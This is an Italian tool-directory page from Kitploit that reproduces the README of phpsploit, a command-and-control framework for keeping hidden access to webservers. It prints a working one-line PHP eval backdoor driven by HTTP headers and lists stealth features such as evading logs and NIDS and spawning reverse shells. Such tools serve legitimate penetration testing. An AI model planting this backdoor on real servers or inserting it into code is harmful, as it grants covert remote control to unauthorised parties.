Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
phpsploit — Framework C2 completo che persiste silenziosamente su un webserver con un backdoor PHP a riga singola | Kitploit
Strumenti/GitHubGitHub/nil0x42/phpsploit
Frameworks per Penetration TestingEscalation di PrivilegiFramework di ExploitMeccanismi di PersistenzaSfruttamento di Applicazioni WebPost-ExploitCommand and ControlRed TeamingSviluppo Payload
GitHubnil0x42/phpsploit

phpsploit

Framework C2 completo che persiste silenziosamente su un webserver con un backdoor PHP a riga singola

2.5k4681092 anni faRevisionato da Kitploit
Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Master

Framework C2 completo che persiste silenziosamente sul
webserver tramite una riga di PHP polimorfica tweet


Workflow dei test unitari

Stato Dependabot
Qualità del codice codacy
Workflow CodeQL
Copertura codecov
Manutenibilità codeclimate

Creato da nil0x42 e contributori


Panoramica

La comunicazione offuscata viene realizzata utilizzando intestazioni HTTP nelle richieste client standard e nelle relative risposte del server web, incanalata attraverso un minuscolo backdoor polimorfico:

root@kitploit:~
<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>

Avvio rapido

root@kitploit:~
git clone https://github.com/nil0x42/phpsploit
cd phpsploit/
pip3 install -r requirements.txt
./phpsploit --interactive --eval "help help"

Caratteristiche

  • Efficiente: Più di 20 plugin per automatizzare le attività di escalation dei privilegi

    • Eseguire comandi e navigare nel filesystem, bypassando le restrizioni di sicurezza PHP
    • Caricare/Scaricare file tra client e target
    • Modificare file remoti tramite editor di testo locale
    • Eseguire console SQL sul sistema target
    • Generare shell TCP inverse
  • Furtivo: Il framework è fatto da paranoici, per paranoici

    • Quasi invisibile all'analisi dei log e al rilevamento di firme NIDS
    • Safe-mode e bypass delle comuni restrizioni di sicurezza PHP
    • Le comunicazioni sono nascoste nelle intestazioni HTTP
    • I payload caricati sono offuscati per bypassare NIDS
    • Supporto proxy http/https/socks4/socks5
  • Comodo: Un'interfaccia robusta con molte funzionalità cruciali

    • Aiuto dettagliato per qualsiasi opzione (comando help)
    • Cross-platform sia su client che server
    • La CLI supporta auto-completamento e multi-comando
    • Funzione di salvataggio/caricamento sessione e cronologia persistente
    • Supporto multi-richiesta per payload grandi (come upload)
    • Fornisce un potente motore di impostazioni altamente configurabile
    • Ogni impostazione, come user-agent, ha una modalità polimorfica
    • Variabili d'ambiente personalizzabili per l'interazione dei plugin
    • Fornisce un'API completa per lo sviluppo di plugin

Piattaforme supportate (come attaccante):

  • GNU/Linux
  • Mac OS X

Piattaforme supportate (come target):

  • GNU/Linux
  • BSD-like
  • Mac OS X
  • Windows NT

Contributori

Grazie a queste meravigliose persone:


nil0x42

💻 🚇 🔌 ⚠️

shiney-wh

💻 🔌

Wannes Rombouts

💻 🚧

Amine Ben Asker

💻 🚧

jose nazario

📖

Questo progetto segue le specifiche all-contributors. Contributi di ogni tipo sono benvenuti

Scarica lo strumento
🐛

Sujit Ghosal

📝

Zerdoumi

🐛

tristandostaler

🐛

Rohan Tarai

🐛

Jonas Lejon

📝